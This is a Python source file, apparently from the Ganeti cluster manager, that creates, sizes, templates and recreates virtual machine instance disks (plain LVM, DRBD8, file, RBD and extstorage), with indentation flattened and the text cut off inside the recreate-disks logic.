created_devices = []
try:
if device.CreateOnSecondary():
force_create = True
if device.children:
for child in device.children:
devs = _CreateBlockDevInner(lu, node_uuid, instance, child,
force_create, info, force_open, excl_stor)
created_devices.extend(devs)
if not force_create:
return created_devices
CreateSingleBlockDev(lu, node_uuid, instance, device, info, force_open,
excl_stor)
# The device has been completely created, so there is no point in keeping
# its subdevices in the list. We just add the device itself instead.
created_devices = [(node_uuid, device)]
return created_devices
except errors.DeviceCreationError, e:
e.created_devices.extend(created_devices)
raise e
except errors.OpExecError, e:
raise errors.DeviceCreationError(str(e), created_devices)
def IsExclusiveStorageEnabledNodeUuid(cfg, node_uuid):
"""Whether exclusive_storage is in effect for the given node.
@type cfg: L{config.ConfigWriter}
@param cfg: The cluster configuration
@type node_uuid: string
@param node_uuid: The node UUID
@rtype: bool
@return: The effective value of exclusive_storage
@raise errors.OpPrereqError: if no node exists with the given name
"""
ni = cfg.GetNodeInfo(node_uuid)
if ni is None:
raise errors.OpPrereqError("Invalid node UUID %s" % node_uuid,
errors.ECODE_NOENT)
return IsExclusiveStorageEnabledNode(cfg, ni)
def _CreateBlockDev(lu, node_uuid, instance, device, force_create, info,
force_open):
"""Wrapper around L{_CreateBlockDevInner}.
This method annotates the root device first.
"""
(disk,) = AnnotateDiskParams(instance, [device], lu.cfg)
excl_stor = IsExclusiveStorageEnabledNodeUuid(lu.cfg, node_uuid)
return _CreateBlockDevInner(lu, node_uuid, instance, disk, force_create, info,
force_open, excl_stor)
def _UndoCreateDisks(lu, disks_created, instance):
"""Undo the work performed by L{CreateDisks}.
This function is called in case of an error to undo the work of
L{CreateDisks}.
@type lu: L{LogicalUnit}
@param lu: the logical unit on whose behalf we execute
@param disks_created: the result returned by L{CreateDisks}
@type instance: L{objects.Instance}
@param instance: the instance for which disks were created
"""
for (node_uuid, disk) in disks_created:
result = lu.rpc.call_blockdev_remove(node_uuid, (disk, instance))
result.Warn("Failed to remove newly-created disk %s on node %s" %
(disk, lu.cfg.GetNodeName(node_uuid)), logging.warning)
def CreateDisks(lu, instance, disk_template=None,
to_skip=None, target_node_uuid=None, disks=None):
"""Create all disks for an instance.
This abstracts away some work from AddInstance.
Since the instance may not have been saved to the config file yet, this
function can not query the config file for the instance's disks; in that
case they need to be passed as an argument.
This function is also used by the disk template conversion mechanism to
create the new disks of the instance. Since the instance will have the
old template at the time we create the new disks, the new template must
be passed as an extra argument.
@type lu: L{LogicalUnit}
@param lu: the logical unit on whose behalf we execute
@type instance: L{objects.Instance}
@param instance: the instance whose disks we should create
@type disk_template: string
@param disk_template: if provided, overrides the instance's disk_template
@type to_skip: list
@param to_skip: list of indices to skip
@type target_node_uuid: string
@param target_node_uuid: if passed, overrides the target node for creation
@type disks: list of {objects.Disk}
@param disks: the disks to create; if not specified, all the disks of the
instance are created
@return: information about the created disks, to be used to call
L{_UndoCreateDisks}
@raise errors.OpPrereqError: in case of error
"""
info = GetInstanceInfoText(instance)
if disks is None:
disks = lu.cfg.GetInstanceDisks(instance.uuid)
if target_node_uuid is None:
pnode_uuid = instance.primary_node
# We cannot use config's 'GetInstanceNodes' here as 'CreateDisks'
# is used by 'LUInstanceCreate' and the instance object is not
# stored in the config yet.
all_node_uuids = []
for disk in disks:
all_node_uuids.extend(disk.all_nodes)
all_node_uuids = set(all_node_uuids)
# ensure that primary node is always the first
all_node_uuids.discard(pnode_uuid)
all_node_uuids = [pnode_uuid] + list(all_node_uuids)
else:
pnode_uuid = target_node_uuid
all_node_uuids = [pnode_uuid]
if disk_template is None:
disk_template = utils.GetDiskTemplate(disks)
if disk_template == constants.DT_MIXED:
raise errors.OpExecError("Creating disk for '%s' instances "
"only possible with explicit disk template."
% (constants.DT_MIXED,))
CheckDiskTemplateEnabled(lu.cfg.GetClusterInfo(), disk_template)
if disk_template in constants.DTS_FILEBASED:
file_storage_dir = os.path.dirname(disks[0].logical_id[1])
result = lu.rpc.call_file_storage_dir_create(pnode_uuid, file_storage_dir)
result.Raise("Failed to create directory '%s' on"
" node %s" % (file_storage_dir,
lu.cfg.GetNodeName(pnode_uuid)))
disks_created = []
for idx, device in enumerate(disks):
if to_skip and idx in to_skip:
continue
logging.info("Creating disk %s for instance '%s'", idx, instance.name)
for node_uuid in all_node_uuids:
f_create = node_uuid == pnode_uuid
try:
_CreateBlockDev(lu, node_uuid, instance, device, f_create, info,
f_create)
disks_created.append((node_uuid, device))
except errors.DeviceCreationError, e:
logging.warning("Creating disk %s for instance '%s' failed",
idx, instance.name)
disks_created.extend(e.created_devices)
_UndoCreateDisks(lu, disks_created, instance)
raise errors.OpExecError(e.message)
return disks_created
def ComputeDiskSizePerVG(disk_template, disks):
"""Compute disk size requirements in the volume group
"""
def _compute(disks, payload):
"""Universal algorithm.
"""
vgs = {}
for disk in disks:
vg_name = disk[constants.IDISK_VG]
vgs[vg_name] = \
vgs.get(vg_name, 0) + disk[constants.IDISK_SIZE] + payload
return vgs
# Required free disk space as a function of disk and swap space
req_size_dict = {
constants.DT_DISKLESS: {},
constants.DT_PLAIN: _compute(disks, 0),
# 128 MB are added for drbd metadata for each disk
constants.DT_DRBD8: _compute(disks, constants.DRBD_META_SIZE),
constants.DT_FILE: {},
constants.DT_SHARED_FILE: {},
constants.DT_GLUSTER: {},
}
if disk_template not in req_size_dict:
raise errors.ProgrammerError("Disk template '%s' size requirement"
" is unknown" % disk_template)
return req_size_dict[disk_template]
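# Illustrative example (not part of the original module, assuming
# constants.DRBD_META_SIZE is 128 and constants.IDISK_VG/IDISK_SIZE are the
# usual 'vg'/'size' keys): for two disks of 1024 and 2048 MiB in volume group
# 'xenvg', ComputeDiskSizePerVG returns {'xenvg': 3072} for DT_PLAIN and
# {'xenvg': 3328} for DT_DRBD8, since 128 MiB of DRBD metadata is added per disk.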
def ComputeDisks(disks, disk_template, default_vg):
"""Computes the instance disks.
@type disks: list of dictionaries
@param disks: The disks' input dictionary
@type disk_template: string
@param disk_template: The disk template of the instance
@type default_vg: string
@param default_vg: The default_vg to assume
@return: The computed disks
"""
new_disks = []
for disk in disks:
mode = disk.get(constants.IDISK_MODE, constants.DISK_RDWR)
if mode not in constants.DISK_ACCESS_SET:
raise errors.OpPrereqError("Invalid disk access mode '%s'" %
mode, errors.ECODE_INVAL)
size = disk.get(constants.IDISK_SIZE, None)
if size is None:
raise errors.OpPrereqError("Missing disk size", errors.ECODE_INVAL)
try:
size = int(size)
except (TypeError, ValueError):
raise errors.OpPrereqError("Invalid disk size '%s'" % size,
errors.ECODE_INVAL)
CheckDiskExtProvider(disk, disk_template)
data_vg = disk.get(constants.IDISK_VG, default_vg)
name = disk.get(constants.IDISK_NAME, None)
if name is not None and name.lower() == constants.VALUE_NONE:
name = None
new_disk = {
constants.IDISK_SIZE: size,
constants.IDISK_MODE: mode,
constants.IDISK_VG: data_vg,
constants.IDISK_NAME: name,
constants.IDISK_TYPE: disk_template,
}
for key in [
constants.IDISK_METAVG,
constants.IDISK_ADOPT,
constants.IDISK_SPINDLES,
]:
if key in disk:
new_disk[key] = disk[key]
# Add IDISK_ACCESS parameter for disk templates that support it
if (disk_template in constants.DTS_HAVE_ACCESS and
constants.IDISK_ACCESS in disk):
new_disk[constants.IDISK_ACCESS] = disk[constants.IDISK_ACCESS]
# For extstorage, demand the `provider' option and add any
# additional parameters (ext-params) to the dict
if disk_template == constants.DT_EXT:
new_disk[constants.IDISK_PROVIDER] = disk[constants.IDISK_PROVIDER]
for key in disk:
if key not in constants.IDISK_PARAMS:
new_disk[key] = disk[key]
new_disks.append(new_disk)
return new_disks
def ComputeDisksInfo(disks, disk_template, default_vg, ext_params):
"""Computes the new instance's disks for the template conversion.
This method is used by the disks template conversion mechanism. Using the
'ComputeDisks' method as an auxiliary method computes the disks that will be
used for generating the new disk template of the instance. It computes the
size, mode, and name parameters from the instance's current disks, such as
the volume group and the access parameters for the templates that support
them. For conversions targeting an extstorage template, the mandatory
provider's name or any user-provided extstorage parameters will also be
included in the result.
@type disks: list of {objects.Disk}
@param disks: The current disks of the instance
@type disk_template: string
@param disk_template: The disk template of the instance
@type default_vg: string
@param default_vg: The default volume group to assume
@type ext_params: dict
@param ext_params: The extstorage parameters
@rtype: list of dictionaries
@return: The computed disks' information for the new template
"""
# Ensure 'ext_params' does not violate existing disks' params
for key in ext_params.keys():
if key != constants.IDISK_PROVIDER:
assert key not in constants.IDISK_PARAMS, \
"Invalid extstorage parameter '%s'" % key
# Prepare the disks argument for the 'ComputeDisks' method.
inst_disks = [dict((key, value) for key, value in disk.iteritems()
if key in constants.IDISK_PARAMS)
for disk in map(objects.Disk.ToDict, disks)]
# Update disks with the user-provided 'ext_params'.
for disk in inst_disks:
disk.update(ext_params)
# Compute the new disks' information.
new_disks = ComputeDisks(inst_disks, disk_template, default_vg)
# Add missing parameters to the previously computed disks.
for disk, new_disk in zip(disks, new_disks):
# Conversions between ExtStorage templates allowed only for different
# providers.
if (disk.dev_type == disk_template and
disk_template == constants.DT_EXT):
provider = new_disk[constants.IDISK_PROVIDER]
if provider == disk.params[constants.IDISK_PROVIDER]:
raise errors.OpPrereqError("Not converting, '%s' of type ExtStorage"
" already using provider '%s'" %
(disk.iv_name, provider), errors.ECODE_INVAL)
# Add IDISK_ACCESS parameter for conversions between disk templates that
# support it.
if (disk_template in constants.DTS_HAVE_ACCESS and
constants.IDISK_ACCESS in disk.params):
new_disk[constants.IDISK_ACCESS] = disk.params[constants.IDISK_ACCESS]
# For LVM-based conversions (plain <-> drbd) use the same volume group.
if disk_template in constants.DTS_LVM:
if disk.dev_type == constants.DT_PLAIN:
new_disk[constants.IDISK_VG] = disk.logical_id[0]
elif disk.dev_type == constants.DT_DRBD8:
new_disk[constants.IDISK_VG] = disk.children[0].logical_id[0]
return new_disks
def CalculateFileStorageDir(disk_type, cfg, instance_name,
file_storage_dir=None):
"""Calculate final instance file storage dir.
@type disk_type: disk template
@param disk_type: L{constants.DT_FILE}, L{constants.DT_SHARED_FILE}, or
L{constants.DT_GLUSTER}
@type cfg: ConfigWriter
@param cfg: the configuration that is to be used.
@type file_storage_dir: path
@param file_storage_dir: the path below the configured base.
@type instance_name: string
@param instance_name: name of the instance this disk is for.
@rtype: string
@return: The file storage directory for the instance
"""
# file storage dir calculation/check
instance_file_storage_dir = None
if disk_type in constants.DTS_FILEBASED:
# build the full file storage dir path
joinargs = []
cfg_storage = None
if disk_type == constants.DT_FILE:
cfg_storage = cfg.GetFileStorageDir()
elif disk_type == constants.DT_SHARED_FILE:
cfg_storage = cfg.GetSharedFileStorageDir()
elif disk_type == constants.DT_GLUSTER:
cfg_storage = cfg.GetGlusterStorageDir()
if not cfg_storage:
raise errors.OpPrereqError(
"Cluster file storage dir for {tpl} storage type not defined".format(
tpl=repr(disk_type)
),
errors.ECODE_STATE)
joinargs.append(cfg_storage)
if file_storage_dir is not None:
joinargs.append(file_storage_dir)
if disk_type != constants.DT_GLUSTER:
joinargs.append(instance_name)
if len(joinargs) > 1:
instance_file_storage_dir = utils.PathJoin(*joinargs)
else:
instance_file_storage_dir = joinargs[0]
return instance_file_storage_dir
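# Illustrative example (hypothetical paths, not part of the original module):
# with a cluster file storage dir of '/srv/ganeti/file-storage',
#   CalculateFileStorageDir(constants.DT_FILE, cfg, 'inst1.example.com', 'mydir')
# yields '/srv/ganeti/file-storage/mydir/inst1.example.com', whereas DT_GLUSTER
# omits the trailing instance-name component.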
def CheckRADOSFreeSpace():
"""Compute disk size requirements inside the RADOS cluster.
"""
# For the RADOS cluster we assume there is always enough space.
pass
def _GenerateDRBD8Branch(lu, primary_uuid, secondary_uuid, size, vgnames, names,
iv_name, forthcoming=False):
"""Generate a drbd8 device complete with its children.
"""
assert len(vgnames) == len(names) == 2
port = lu.cfg.AllocatePort()
shared_secret = lu.cfg.GenerateDRBDSecret(lu.proc.GetECId())
dev_data = objects.Disk(dev_type=constants.DT_PLAIN, size=size,
logical_id=(vgnames[0], names[0]),
nodes=[primary_uuid, secondary_uuid],
params={}, forthcoming=forthcoming)
dev_data.uuid = lu.cfg.GenerateUniqueID(lu.proc.GetECId())
dev_meta = objects.Disk(dev_type=constants.DT_PLAIN,
size=constants.DRBD_META_SIZE,
logical_id=(vgnames[1], names[1]),
nodes=[primary_uuid, secondary_uuid],
params={}, forthcoming=forthcoming)
dev_meta.uuid = lu.cfg.GenerateUniqueID(lu.proc.GetECId())
drbd_uuid = lu.cfg.GenerateUniqueID(lu.proc.GetECId())
minors = lu.cfg.AllocateDRBDMinor([primary_uuid, secondary_uuid], drbd_uuid)
assert len(minors) == 2
drbd_dev = objects.Disk(dev_type=constants.DT_DRBD8, size=size,
logical_id=(primary_uuid, secondary_uuid, port,
minors[0], minors[1],
shared_secret),
children=[dev_data, dev_meta],
nodes=[primary_uuid, secondary_uuid],
iv_name=iv_name, params={},
forthcoming=forthcoming)
drbd_dev.uuid = drbd_uuid
return drbd_dev
def GenerateDiskTemplate(
lu, template_name, instance_uuid, primary_node_uuid, secondary_node_uuids,
disk_info, file_storage_dir, file_driver, base_index,
feedback_fn, full_disk_params, forthcoming=False):
"""Generate the entire disk layout for a given template type.
"""
vgname = lu.cfg.GetVGName()
disk_count = len(disk_info)
disks = []
CheckDiskTemplateEnabled(lu.cfg.GetClusterInfo(), template_name)
if template_name == constants.DT_DISKLESS:
pass
elif template_name == constants.DT_DRBD8:
if len(secondary_node_uuids) != 1:
raise errors.ProgrammerError("Wrong template configuration")
remote_node_uuid = secondary_node_uuids[0]
drbd_params = objects.Disk.ComputeLDParams(template_name,
full_disk_params)[0]
drbd_default_metavg = drbd_params[constants.LDP_DEFAULT_METAVG]
names = []
for lv_prefix in _GenerateUniqueNames(lu, [".disk%d" % (base_index + i)
for i in range(disk_count)]):
names.append(lv_prefix + "_data")
names.append(lv_prefix + "_meta")
for idx, disk in enumerate(disk_info):
disk_index = idx + base_index
data_vg = disk.get(constants.IDISK_VG, vgname)
meta_vg = disk.get(constants.IDISK_METAVG, drbd_default_metavg)
disk_dev = _GenerateDRBD8Branch(lu, primary_node_uuid, remote_node_uuid,
disk[constants.IDISK_SIZE],
[data_vg, meta_vg],
names[idx * 2:idx * 2 + 2],
"disk/%d" % disk_index,
forthcoming=forthcoming)
disk_dev.mode = disk[constants.IDISK_MODE]
disk_dev.name = disk.get(constants.IDISK_NAME, None)
disk_dev.dev_type = template_name
disks.append(disk_dev)
else:
if secondary_node_uuids:
raise errors.ProgrammerError("Wrong template configuration")
name_prefix = _DISK_TEMPLATE_NAME_PREFIX.get(template_name, None)
if name_prefix is None:
names = None
else:
names = _GenerateUniqueNames(lu, ["%s.disk%s" %
(name_prefix, base_index + i)
for i in range(disk_count)])
disk_nodes = []
if template_name == constants.DT_PLAIN:
def logical_id_fn(idx, _, disk):
vg = disk.get(constants.IDISK_VG, vgname)
return (vg, names[idx])
disk_nodes = [primary_node_uuid]
elif template_name == constants.DT_GLUSTER:
logical_id_fn = lambda _1, disk_index, _2: \
(file_driver, "ganeti/%s.%d" % (instance_uuid,
disk_index))
elif template_name in constants.DTS_FILEBASED: # Gluster handled above
logical_id_fn = \
lambda idx, disk_index, disk: (file_driver,
"%s/%s" % (file_storage_dir,
names[idx]))
if template_name == constants.DT_FILE:
disk_nodes = [primary_node_uuid]
elif template_name == constants.DT_BLOCK:
logical_id_fn = \
lambda idx, disk_index, disk: (constants.BLOCKDEV_DRIVER_MANUAL,
disk[constants.IDISK_ADOPT])
elif template_name == constants.DT_RBD:
logical_id_fn = lambda idx, _, disk: ("rbd", names[idx])
elif template_name == constants.DT_EXT:
def logical_id_fn(idx, _, disk):
provider = disk.get(constants.IDISK_PROVIDER, None)
if provider is None:
raise errors.ProgrammerError("Disk template is %s, but '%s' is"
" not found", constants.DT_EXT,
constants.IDISK_PROVIDER)
return (provider, names[idx])
else:
raise errors.ProgrammerError("Unknown disk template '%s'" % template_name)
dev_type = template_name
for idx, disk in enumerate(disk_info):
params = {}
# Only for the Ext template add disk_info to params
if template_name == constants.DT_EXT:
params[constants.IDISK_PROVIDER] = disk[constants.IDISK_PROVIDER]
for key in disk:
if key not in constants.IDISK_PARAMS:
params[key] = disk[key]
# Add IDISK_ACCESS param to disk params
if (template_name in constants.DTS_HAVE_ACCESS and
constants.IDISK_ACCESS in disk):
params[constants.IDISK_ACCESS] = disk[constants.IDISK_ACCESS]
disk_index = idx + base_index
size = disk[constants.IDISK_SIZE]
feedback_fn("* disk %s, size %s" %
(disk_index, utils.FormatUnit(size, "h")))
disk_dev = objects.Disk(dev_type=dev_type, size=size,
logical_id=logical_id_fn(idx, disk_index, disk),
iv_name="disk/%d" % disk_index,
mode=disk[constants.IDISK_MODE],
params=params, nodes=disk_nodes,
spindles=disk.get(constants.IDISK_SPINDLES),
forthcoming=forthcoming)
disk_dev.name = disk.get(constants.IDISK_NAME, None)
disk_dev.uuid = lu.cfg.GenerateUniqueID(lu.proc.GetECId())
disks.append(disk_dev)
return disks
def CommitDisks(disks):
"""Recursively remove the forthcoming flag
"""
for disk in disks:
disk.forthcoming = False
CommitDisks(disk.children)
def CheckSpindlesExclusiveStorage(diskdict, es_flag, required):
"""Check the presence of the spindle options with exclusive_storage.
@type diskdict: dict
@param diskdict: disk parameters
@type es_flag: bool
  @param es_flag: the effective value of the exclusive_storage flag
@type required: bool
@param required: whether spindles are required or just optional
@raise errors.OpPrereqError when spindles are given and they should not
"""
if (not es_flag and constants.IDISK_SPINDLES in diskdict and
diskdict[constants.IDISK_SPINDLES] is not None):
raise errors.OpPrereqError("Spindles in instance disks cannot be specified"
" when exclusive storage is not active",
errors.ECODE_INVAL)
if (es_flag and required and (constants.IDISK_SPINDLES not in diskdict or
diskdict[constants.IDISK_SPINDLES] is None)):
raise errors.OpPrereqError("You must specify spindles in instance disks"
" when exclusive storage is active",
errors.ECODE_INVAL)
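# Illustrative sketch of the check above (hypothetical parameter values, not
# taken from a real opcode):
#   CheckSpindlesExclusiveStorage({constants.IDISK_SPINDLES: 2}, False, True)
#     -> OpPrereqError: spindles given while exclusive storage is inactive
#   CheckSpindlesExclusiveStorage({constants.IDISK_SIZE: 1024}, True, True)
#     -> OpPrereqError: spindles required but not specified
#   CheckSpindlesExclusiveStorage({constants.IDISK_SPINDLES: 2}, True, True)
#     -> passes silently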
def CheckDiskExtProvider(diskdict, disk_template):
"""Check that the given disk should or should not have the provider param.
@type diskdict: dict
@param diskdict: disk parameters
@type disk_template: string
@param disk_template: the desired template of this disk
@raise errors.OpPrereqError: when the parameter is used in the wrong way
"""
ext_provider = diskdict.get(constants.IDISK_PROVIDER, None)
if ext_provider and disk_template != constants.DT_EXT:
raise errors.OpPrereqError("The '%s' option is only valid for the %s"
" disk template, not %s" %
(constants.IDISK_PROVIDER, constants.DT_EXT,
disk_template), errors.ECODE_INVAL)
if ext_provider is None and disk_template == constants.DT_EXT:
raise errors.OpPrereqError("Missing provider for template '%s'" %
constants.DT_EXT, errors.ECODE_INVAL)
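# Illustrative sketch of the provider check (the provider name "pvdr" is made
# up for the example):
#   CheckDiskExtProvider({constants.IDISK_PROVIDER: "pvdr"}, constants.DT_EXT)
#     -> passes
#   CheckDiskExtProvider({constants.IDISK_PROVIDER: "pvdr"}, constants.DT_PLAIN)
#     -> OpPrereqError: provider is only valid for the ext template
#   CheckDiskExtProvider({}, constants.DT_EXT)
#     -> OpPrereqError: missing provider for an ext disk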
class LUInstanceRecreateDisks(LogicalUnit):
"""Recreate an instance's missing disks.
"""
HPATH = "instance-recreate-disks"
HTYPE = constants.HTYPE_INSTANCE
REQ_BGL = False
_MODIFYABLE = compat.UniqueFrozenset([
constants.IDISK_SIZE,
constants.IDISK_MODE,
constants.IDISK_SPINDLES,
])
# New or changed disk parameters may have different semantics
assert constants.IDISK_PARAMS == (_MODIFYABLE | frozenset([
constants.IDISK_ADOPT,
# TODO: Implement support changing VG while recreating
constants.IDISK_VG,
constants.IDISK_METAVG,
constants.IDISK_PROVIDER,
constants.IDISK_NAME,
constants.IDISK_ACCESS,
constants.IDISK_TYPE,
]))
def _RunAllocator(self):
"""Run the allocator based on input opcode.
"""
be_full = self.cfg.GetClusterInfo().FillBE(self.instance)
# FIXME
# The allocator should actually run in "relocate" mode, but current
# allocators don't support relocating all the nodes of an instance at
# the same time. As a workaround we use "allocate" mode, but this is
# suboptimal for two reasons:
# - The instance name passed to the allocator is present in the list of
# existing instances, so there could be a conflict within the
# internal structures of the allocator. This doesn't happen with the
# current allocators, but it's a liability.
# - The allocator counts the resources used by the instance twice: once
# because the instance exists already, and once because it tries to
# allocate a new instance.
# The allocator could choose some of the nodes on which the instance is
# running, but that's not a problem. If the instance nodes are broken,
    # they should already be marked as drained or offline, and hence
# skipped by the allocator. If instance disks have been lost for other
# reasons, then recreating the disks on the same nodes should be fine.
spindle_use = be_full[constants.BE_SPINDLE_USE]
disk_template = self.cfg.GetInstanceDiskTemplate(self.instance.uuid)
disks = [{
constants.IDISK_SIZE: d.size,
constants.IDISK_MODE: d.mode,
constants.IDISK_SPINDLES: d.spindles,
constants.IDISK_TYPE: d.dev_type
} for d in self.cfg.GetInstanceDisks(self.instance.uuid)]
req = iallocator.IAReqInstanceAlloc(name=self.op.instance_name,
disk_template=disk_template,
group_name=None,
tags=list(self.instance.GetTags()),
os=self.instance.os,
nics=[{}],
vcpus=be_full[constants.BE_VCPUS],
memory=be_full[constants.BE_MAXMEM],
spindle_use=spindle_use,
disks=disks,
hypervisor=self.instance.hypervisor,
node_whitelist=None)
ial = iallocator.IAllocator(self.cfg, self.rpc, req)
ial.Run(self.op.iallocator)
assert req.RequiredNodes() == \
len(self.cfg.GetInstanceNodes(self.instance.uuid))
if not ial.success:
raise errors.OpPrereqError("Can't compute nodes using iallocator '%s':"
" %s" % (self.op.iallocator, ial.info),
errors.ECODE_NORES)
(self.op.node_uuids, self.op.nodes) = GetWantedNodes(self, ial.result)
self.LogInfo("Selected nodes for instance %s via iallocator %s: %s",
self.op.instance_name, self.op.iallocator,
utils.CommaJoin(self.op.nodes))
def CheckArguments(self):
if self.op.disks and ht.TNonNegativeInt(self.op.disks[0]):
# Normalize and convert deprecated list of disk indices
self.op.disks = [(idx, {}) for idx in sorted(frozenset(self.op.disks))]
duplicates = utils.FindDuplicates(map(compat.fst, self.op.disks))
if duplicates:
raise errors.OpPrereqError("Some disks have been specified more than"
" once: %s" % utils.CommaJoin(duplicates),
errors.ECODE_INVAL)
# We don't want _CheckIAllocatorOrNode selecting the default iallocator
# when neither iallocator nor nodes are specified
if self.op.iallocator or self.op.nodes:
CheckIAllocatorOrNode(self, "iallocator", "nodes")
for (idx, params) in self.op.disks:
utils.ForceDictType(params, constants.IDISK_PARAMS_TYPES)
unsupported = frozenset(params.keys()) - self._MODIFYABLE
if unsupported:
raise errors.OpPrereqError("Parameters for disk %s try to change"
" unmodifyable parameter(s): %s" %
(idx, utils.CommaJoin(unsupported)),
errors.ECODE_INVAL)
def ExpandNames(self):
self._ExpandAndLockInstance()
self.recalculate_locks[locking.LEVEL_NODE] = constants.LOCKS_APPEND
if self.op.nodes:
(self.op.node_uuids, self.op.nodes) = GetWantedNodes(self, self.op.nodes)
self.needed_locks[locking.LEVEL_NODE] = list(self.op.node_uuids)
else:
self.needed_locks[locking.LEVEL_NODE] = []
if self.op.iallocator:
# iallocator will select a new node in the same group
self.needed_locks[locking.LEVEL_NODEGROUP] = []
self.needed_locks[locking.LEVEL_NODE_RES] = []
self.dont_collate_locks[locking.LEVEL_NODEGROUP] = True
self.dont_collate_locks[locking.LEVEL_NODE] = True
self.dont_collate_locks[locking.LEVEL_NODE_RES] = True
def DeclareLocks(self, level):
if level == locking.LEVEL_NODEGROUP:
assert self.op.iallocator is not None
assert not self.op.nodes
assert not self.needed_locks[locking.LEVEL_NODEGROUP]
self.share_locks[locking.LEVEL_NODEGROUP] = 1
# Lock the primary group used by the instance optimistically; this
# requires going via the node before it's locked, requiring
# verification later on
self.needed_locks[locking.LEVEL_NODEGROUP] = \
self.cfg.GetInstanceNodeGroups(self.op.instance_uuid, primary_only=True)
elif level == locking.LEVEL_NODE:
# If an allocator is used, then we lock all the nodes in the current
# instance group, as we don't know yet which ones will be selected;
# if we replace the nodes without using an allocator, locks are
# already declared in ExpandNames; otherwise, we need to lock all the
# instance nodes for disk re-creation
if self.op.iallocator:
assert not self.op.nodes
assert not self.needed_locks[locking.LEVEL_NODE]
assert len(self.owned_locks(locking.LEVEL_NODEGROUP)) == 1
# Lock member nodes of the group of the primary node
for group_uuid in self.owned_locks(locking.LEVEL_NODEGROUP):
self.needed_locks[locking.LEVEL_NODE].extend(
self.cfg.GetNodeGroup(group_uuid).members)
elif not self.op.nodes:
self._LockInstancesNodes(primary_only=False)
elif level == locking.LEVEL_NODE_RES:
# Copy node locks
self.needed_locks[locking.LEVEL_NODE_RES] = \
CopyLockList(self.needed_locks[locking.LEVEL_NODE])
def BuildHooksEnv(self):
"""Build hooks env.
This runs on master, primary and secondary nodes of the instance.
"""
return BuildInstanceHookEnvByObject(self, self.instance)
def BuildHooksNodes(self):
"""Build hooks nodes.
"""
nl = [self.cfg.GetMasterNode()] + \
list(self.cfg.GetInstanceNodes(self.instance.uuid))
return (nl, nl)
def CheckPrereq(self):
"""Check prerequisites.
This checks that the instance is in the cluster and is not running.
"""
instance = self.cfg.GetInstanceInfo(self.op.instance_uuid)
assert instance is not None, \
"Cannot retrieve locked instance %s" % self.op.instance_name
if self.op.node_uuids:
inst_nodes = self.cfg.GetInstanceNodes(instance.uuid)
if len(self.op.node_uuids) != len(inst_nodes):
raise errors.OpPrereqError("Instance %s currently has %d nodes, but"
" %d replacement nodes were specified" %
(instance.name, len(inst_nodes),
len(self.op.node_uuids)),
errors.ECODE_INVAL)
disks = self.cfg.GetInstanceDisks(instance.uuid)
assert (not utils.AnyDiskOfType(disks, [constants.DT_DRBD8]) or
len(self.op.node_uuids) == 2)
assert (not utils.AnyDiskOfType(disks, [constants.DT_PLAIN]) or
len(self.op.node_uuids) == 1)
primary_node = self.op.node_uuids[0]
else:
primary_node = instance.primary_node
if not self.op.iallocator:
CheckNodeOnline(self, primary_node)
if not instance.disks:
raise errors.OpPrereqError("Instance '%s' has no disks" %
self.op.instance_name, errors.ECODE_INVAL)
# Verify if node group locks are still correct
owned_groups = self.owned_locks(locking.LEVEL_NODEGROUP)
if owned_groups:
# Node group locks are acquired only for the primary node (and only
# when the allocator is used)
CheckInstanceNodeGroups(self.cfg, instance.uuid, owned_groups,
primary_only=True)
# if we replace nodes *and* the old primary is offline, we don't
# check the instance state
old_pnode = self.cfg.GetNodeInfo(instance.primary_node)
if not ((self.op.iallocator or self.op.node_uuids) and old_pnode.offline):
CheckInstanceState(self, instance, INSTANCE_NOT_RUNNING,
msg="cannot recreate disks")
if self.op.disks:
self.disks = dict(self.op.disks)
else:
self.disks = dict((idx, {}) for idx in range(len(instance.disks)))
maxidx = max(self.disks.keys())
if maxidx >= len(instance.disks):
raise errors.OpPrereqError("Invalid disk index '%s'" % maxidx,
errors.ECODE_INVAL)
if ((self.op.node_uuids or self.op.iallocator) and
sorted(self.disks.keys()) != range(len(instance.disks))):
raise errors.OpPrereqError("Can't recreate disks partially and"
" change the nodes at the same time",
errors.ECODE_INVAL)
self.instance = instance
if self.op.iallocator:
self._RunAllocator()
# Release unneeded node and node resource locks
ReleaseLocks(self, locking.LEVEL_NODE, keep=self.op.node_uuids)
ReleaseLocks(self, locking.LEVEL_NODE_RES, keep=self.op.node_uuids)
if self.op.node_uuids:
node_uuids = self.op.node_uuids
else:
node_uuids = self.cfg.GetInstanceNodes(instance.uuid)
excl_stor = compat.any(
rpc.GetExclusiveStorageForNodes(self.cfg, node_uuids).values()
)
for new_params in self.disks.values():
CheckSpindlesExclusiveStorage(new_params, excl_stor, False)
def Exec(self, feedback_fn):
"""Recreate the disks.
"""
assert (self.owned_locks(locking.LEVEL_NODE) ==
self.owned_locks(locking.LEVEL_NODE_RES))
to_skip = []
mods = [] # keeps track of needed changes
inst_disks = self.cfg.GetInstanceDisks(self.instance.uuid)
for idx, disk in enumerate(inst_disks):
try:
changes = self.disks[idx]
except KeyError:
# Disk should not be recreated
to_skip.append(idx)
continue
# update secondaries for disks, if needed
if self.op.node_uuids and disk.dev_type == constants.DT_DRBD8:
# need to update the nodes and minors
assert len(self.op.node_uuids) == 2
assert len(disk.logical_id) == 6 # otherwise disk internals
# have changed
(_, _, old_port, _, _, old_secret) = disk.logical_id
new_minors = self.cfg.AllocateDRBDMinor(self.op.node_uuids,
disk.uuid)
new_id = (self.op.node_uuids[0], self.op.node_uuids[1], old_port,
new_minors[0], new_minors[1], old_secret)
assert len(disk.logical_id) == len(new_id)
else:
new_id = None
mods.append((idx, new_id, changes))
# now that we have passed all asserts above, we can apply the mods
# in a single run (to avoid partial changes)
for idx, new_id, changes in mods:
disk = inst_disks[idx]
if new_id is not None:
assert disk.dev_type == constants.DT_DRBD8
disk.logical_id = new_id
if changes:
disk.Update(size=changes.get(constants.IDISK_SIZE, None),
mode=changes.get(constants.IDISK_MODE, None),
spindles=changes.get(constants.IDISK_SPINDLES, None))
self.cfg.Update(disk, feedback_fn)
# change primary node, if needed
if self.op.node_uuids:
self.LogWarning("Changing the instance's nodes, you will have to"
" remove any disks left on the older nodes manually")
self.instance.primary_node = self.op.node_uuids[0]
self.cfg.Update(self.instance, feedback_fn)
for disk in inst_disks:
self.cfg.SetDiskNodes(disk.uuid, self.op.node_uuids)
# All touched nodes must be locked
mylocks = self.owned_locks(locking.LEVEL_NODE)
inst_nodes = self.cfg.GetInstanceNodes(self.instance.uuid)
assert mylocks.issuperset(frozenset(inst_nodes))
new_disks = CreateDisks(self, self.instance, to_skip=to_skip)
# TODO: Release node locks before wiping, or explain why it's not possible
